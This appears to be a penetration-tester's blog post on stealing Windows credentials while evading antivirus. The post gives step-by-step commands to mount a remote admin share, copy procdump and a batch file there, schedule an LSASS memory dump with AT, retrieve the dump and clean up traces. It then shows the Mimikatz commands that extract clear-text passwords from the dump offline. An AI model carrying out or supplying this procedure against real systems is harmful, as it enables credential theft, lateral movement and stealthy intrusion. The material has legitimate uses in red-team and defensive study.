= Using Mimikatz Alpha or Getting Clear Text Passwords with a Microsoft Tool
:hp-tags: mimikatz, meterpreter, metasploit

Mimikatz is now [built into Metasploit's meterpreter](https://github.com/rapid7/meterpreter/pull/9), you can do load mimikatz from the meterpreter prompt, but if you don't want to go through the hassle of dealing with AV, reverse or bind payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz's alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS. The great thing about this technique is that the only thing on disk is a Microsoft tool.

Mimikatz Minidump: [http://blog.gentilkiwi.com/securite/mimikatz/minidump](http://blog.gentilkiwi.com/securite/mimikatz/minidump)

Procdump: [http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx](http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx)

Lets start. First we make sure our authentication works against the box and we can look inside of C$ (usually only admins can)

```
net use \\TARGETBOXC$ /user:DOMAIN\serviceaccount serviceaccount123
dir \\TARGETBOX\C$
```    

If that works then we want to check that we can all the "AT" command on the remote host:

```
at \\TARGETBOX
```

All set. Next lets prep our workspace on the remote host. We are using the C:\Temp directory.

```
mkdir \\TARGETBOX\C$\Temp
dir \\TARGETBOX\C$\Temp
copy c:\temp\procdump.exe \\TARGETBOXC$
copy c:\temp\procdump.bat \\TARGETBOXC$
``` 

The contents of procdump.bat are:

```
@echo off
C:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
``` 

I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also help me notice when I've dumped more than one IP that is actually the same host.

Next we schedule the task. Use net time to determine the local time for the remote machine.

```
net time \\TARGETBOX
at \\TARGETBOX 13:52 C:\Temp\procdump.bat
``` 

Pull down the file and clean up:

```
dir \\TARGETBOX\C$\Temp
copy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\
rmdir /s \\TARGETBOX\C$\Temp
``` 

On your side the only thing you need to make sure is that you are running Mimikatz on a similar version and architecture you pulled from. Use the following url for reference:[http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png](http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png)

Load up the Alpha version of Mimikatz, switch it to minidump mode and you're dumping creds:
 
```
mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full
```

Thats it. Password dumping without ever using a "Hacker" tool on target. Much love Microsoft. And even more to Mimikatz creator [@gentilkiwi](http://twitter.com/gentilkiwi) - Benjamin Delpy for both this alpha release and changing his licensing to allow Mimikatz code to be integrated into Meterpreter.